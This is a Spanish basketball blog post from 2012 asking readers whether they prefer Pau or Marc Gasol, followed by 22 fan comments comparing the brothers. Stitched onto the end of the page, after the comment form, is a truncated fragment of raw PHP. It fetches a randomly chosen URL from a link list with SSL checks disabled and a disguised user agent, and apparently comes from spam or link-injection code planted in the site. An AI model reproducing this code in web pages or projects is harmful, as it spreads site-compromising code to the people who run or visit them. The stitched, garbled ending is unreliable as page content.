La pregunta

20 de November de 2012 por txusma

Teniendo en cuenta tan solo su nivel actual, 

¿a qué hermano Gasol preferís, Pau o Marc?

Comenta

22 comentarios a esta entrada

  1. Luis dice:
    #1

    Ahora mismo(que es lo que pides),está mejor Marcl,aunque en las mejores versiones de cada uno me sigue pareciendo mejor Pau(aunque por poco)

      Citar

  2. Esteban dice:
    #2

    La pregunta es enserio? Jajajaja vamos eh Marc para llegar a ser como Pau debe volver a nacer!!

      Citar

  3. Esteban dice:
    #3

    Luis, solo por poco? Como subestiman a pau los españoles

      Citar

  4. Esteban dice:
    #4

    Marc es un exelente pivot, pero exelente y no mas, en cambio pau es una leyenda, esta a la altura de petrovic, divc, sabonis, dirk

      Citar

  5. Noelinho dice:
    #5

    Si comparamos las mejores versiones de ambos no hay color, Pau por goleada.

    Cuando se retire lo echaremos una barbaridad de menos, y nos dará rabia no haberlo valorardo en su justa medidad cuando estaba en activo

      Citar

  6. Vader dice:
    #6

    Pau, el de antes y el de ahora…

      Citar

  7. paco paco paco dice:
    #7

    Chachos no hay colo entre lo do pero ke preguntas. Marc puede ser muy grande, pero ahora y siempre Pau sera el mejoo. A ver si Marc gana 2 anillos i llega a les 15.000 punto. Aunque sea mu bueno, el hermanico e mejo. Chachoos…

      Citar

  8. lost dice:
    #8

    Para mí, ahora mismo está mejor Marc que Pau, por diversas razones. La primera es la edad, tenemos a un jugador que es joven y está en un equipo joven-digamos que tienen futuro- y tenemos a Pau empieza su declive poco a poco(OJO! no digo que sea ahora, pero cada vez bajaran más sus prestaciones) que está en un equipo más veterano, donde no es el jugador tan imprescindible de años atrás(aunque sigue siendo importante) y su equipo tiene un objetivo fijado a corto plazo: el anillo. El segundo motivo es la posición y en el sistema de juego que están cada uno de ellos: Pau es un PF, muy inteligente y con buena mano, pero que ha tenido un cambio muy drástico de entrenador hace poco, de uno muy ordenado a uno que tiene el Run&Gun como forma de vida. Este sistema creo que, por el historial de D’antoni, no beneficia a Pau: D’antoni siempre ha jugado con 4 abiertos y 1 PF de pick’n’roll(Amare en Phoenix o WILSON CHANDLER! en Nueva York), y aunque Pau tiene buen tiro, no es lo que creo que busca D’antoni. En cambio, Marc es center puro. Es un gran center, dominante y muy inteligente, con un gran acierto en la proximidad al aro y muy buena mano en TL para ser un center. Pero todo esto está envuelto por un grandísimo asterisco: estamos en la era de los SF, los centers de los 90, con fundamentos, tiro, defensa brutal y juego de pies(Olojuwon, Ewing, Robinson, etc.) han pasado a mejor vida. Lo que pasa es que si ahora eres un buen center, tienes muchas posibilidades de dominar tu posición, como pasa con Marc, Howard, Bynum, etc., estos C en los 90 se los comían(a Hibbert le daban tras-tras por detrás a gran escala). La evolución que hemos visto en Marc a muchos les ha sorprendido, a mí no, Memphis le dio un voto de confianza y él respondió, pero vamos, para mí Marc está entre bastante y muy sobrevalorado: poder meterle mano a los Heat(jugando con un PF, ahí se notan los kilos), los Kniks(venían de un btb en SA, pero si nadie lo quiere ver…), etc. Curiosamente, el C que peor se le ha dado a Marc a sido Duncan, el último C de los 90, curiosamente… 🙂
    En conclusión, yo me quedo con Pau. Genera mucho más que Marc, aunque atrás es la reina de las monjas en ataque es muchísimo más buen jugador. En definitiva, es más útil y ya está.

    PD: Ahora me diréis que soy un proGasol pero no es verdad. Soy un hater de Pau, Marc e Ibaka(hablando de sobrevalorados) y de muchos más jugadores, pero lo que me jode es que cuando un jugador es mejor que otro no se le valore los suficiente, pero bueno, para gustos, colores.

      Citar

  9. Sancho88 dice:
    #9

    Yo siempre fui de Marc, desde su etapa del Girona. Jugó, para mí, la temporada más completa de un jugador en la liga ACB desde las que se marcaba Arvydas, y al nivel de Lou Roe que todos los aficionados más o menos enterados de la ACB saben las burradas que preparó en su etapa de Sevilla. Desde ahí yo le cogí especial cariño, ahora bien, es una preferencia personal, pero lógicamente Pau es mejor y ha hecho más cosas en su carrera. Visceralmente me quedo con Marc, como decís, recuerda al típico Center puro europeo de los 90 y eso es motivo más que suficiente para idolatrarlo, pues está en peligro de extinción. Como Pau hay otros 9 o 10 jugadores, no con su IQ, pero sí con mejor físico y tal…

    No obstante, tampoco hay una diferencia tan abismal a DÍA DE HOY, que es lo que plantea la pregunta

      Citar

  10. Ekos dice:
    #10

    Nada que añadir a lo dicho por Sancho.

      Citar

  11. rumbero dice:
    #11

    @lost: Yo creo que Marc se merece cada uno de los euros que gana. ¿Que las hubiera pasado canutas con esos 3 monstruos que nombras? Pues seguramente, como el resto de pívots de los 90. Eso no quita que sea un gran center, inteligente y que aporta mucho más al equipo que rebote y puntos, y si a día de hoy no hay pívots tan completos como él igual es porque es del club de los buenos.
    Dicho todo esto y sacando a los hermanos del rol que tienen a día de hoy en cada uno de sus equipos, seguramente me quedo con Pau.

      Citar

  12. lost dice:
    #12

    @rumbero: creo que me he explicado mal. Digo que a Marc se le dio confianza(el contrato) y él responde con un crecimiento muy bueno en la mayoría de los aspectos pero yo solo digo que los C hoy en día les veo sobrevalorados. También es verdad que yo crecí en los 90 viendo a los mejores. Para mí es uno de los más completos hoy en día, y también se tiene que reconocer el mérito de alcanzar el nivel al que ha llegado, pero la diferencia de nivel que veo en general del juego interior de los 90 con lo de ahora es abismal. No sé, es mi forma de ver el baloncesto.

      Citar

  13. Luis dice:
    #13

    Claro que creo que Pau es el mejor español de la historia y no sé si veré alguno mejor(tengo 28 años),pero creo que Marc es muy muy bueno,y cada vez entiende mejor el juego(su IQ mejora por momentos,aunque esta claro que no llega al de Pau).
    Como ya te han dicho lost,no sé si hay pivots mejores que los que nombras y creo que no es justo comparar a Marc con esos para decir si ahora mismo esta mejor o peor que Pau.

      Citar

  14. diestro dice:
    #14

    Si tenemos en cuenta sus roles en sus equipos, ahora mismo me quedo con Marc. Si me dices que elija al mejor ahora mismo independientemente de sus roles, para mi no hay duda de que Pau es muy superior a Marc. Básicamente pienso que Pau en los Lakers no esta siendo aprovechado todo lo que podría ser en cualquier otro equipo de la liga, donde pudiera desarrollar su juego, de hecho este verano se vio el nivel que puede dar.

      Citar

  15. elreylagarto dice:
    #15

    Yo, valorando a Marc, soy de Pau de largo. Fijaos, esta noche frente a los Nets ha estado a tres asistencias del triple doble (sin despeinarse), siendo líder de asistencias del equipo. Un 7 pies siendo el líder de asistencias del equipo…vale que no juega Nash…pero Pau hace de todo y bien en una cancha. Creo que eso no se valora lo suficiente.
    Un saludo a todos.
    Lagarto.

      Citar

  16. Chipi dice:
    #16

    Cada año leemos o escuchamos unas cuantas veces lo del declive de Pau, que no es un jugador imprescindible, que los nuevos sistemas le perjudican, que es el tercer o cuarto espada del equipo, que si lo mejor es un traspado….. y cada año acaba con sus números de 20-10 o rozándolos, admirado, querido y elogiado por todo el mundo, el último D’Antoni, que le ha calificado como el mejor pivot de los últimos años. ¿Vosotros habéis visto alguna vez a Kobe proteger y elogiar a alguien tanto como a Pau?

    Como dicen por ahí arriba, Pau está haciendo historia y le echaremos mucho de menos cuando se retire. Pero hasta ese momento seguiremos dudando de él y llamándole blando. Eso sí, cuando tipos como Josh Smith, Amare, Grffin o Anthony Davis hacen los números de Pau, se nos cae la baba y decimos que van a dominar la NBA en el futuro. Pau no la ha dominado. Simplemente hizo a los Lakers campeones cuando nadie daba un duro por ellos.

    Dicho esto, Marc me parece espectacular. Compararlo con los grandes centers de los noventa es injusto para él y para todo el mundo. Hoy en día, me parece un top3 entre los pívots de la NBA., pero compararlo con su hermano son palabras mayores.

    P.D.- ¿Y si viene Adriá Gasol y se los come a los dos?

      Citar

  17. Denise dice:
    #17

    Pau de calle, Marc es bueno pero no tiene tan capacidad de liderazgo como Pau, además el mayor tiene más recursos y movimientos que el pequeño, tiene más calidad técnica.

      Citar

  18. Viva_Dirk dice:
    #18

    @Chipi: Los Lakers ya habian liderado la conferencia Oeste con Bynum en mismo año que llegó Pau asi que algun duro daria alguien por ellos. Nunca ha promediado 20-10 en una temporada, nunca. Desde luego que es elogiado, es un jugador histórico, pero como jugador histórico cuando no esta a su nivel también hay que darle palos.

      Citar

  19. elreylagarto dice:
    #19

    @Viva_Dirk: Hombre, llevas razón, técnicamente nunca ha tenido un 10-20, pero ha estado muy cerquita en muchas ocasiones. Así que en la práctica se pueden considerar 10-20 los siguientes:
    20.8-9.8 en la 06-07
    18.9-9.6 en la 08-09
    18.8-10.2 en la 10-11
    18.3-11.3 en la 09-10
    20.4-8.9 en la 05-06
    Lo que si es cierto, que es un jugador de una regularidad pasmosa a lo largo de su carrera (18.6-9.2).
    Un saludo,
    Lagarto.

      Citar

  20. nanoke dice:
    #20

    yo no solo de este año sino desde hace bte prefiero a marc que a pau, porque marc aporta en todo, defensa, ataque, intangibles y en eso pau nunca fue su fuerte, ademas de muchas mas intensidad y caracter por parte de marc.

      Citar

  21. nanoke dice:
    #21

    lo unico que le falta a marc para que todo el mundo se de cuenta de que es mejor que pau, es tener la suerte como tuvo pau de caer en un contender con opciones de anillo y ganarlo.

      Citar

  22. MagicJohnson32 dice:
    #22

    ¿Sabéis que Marc lidera la NBA en ratio asistencia/pérdida? Lo digo de memoria, pero creo que da 4,5 asistencias por cada pérdida que comete, una cosa brutal, y lleva ya siete partidos con 5 asistencias o más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>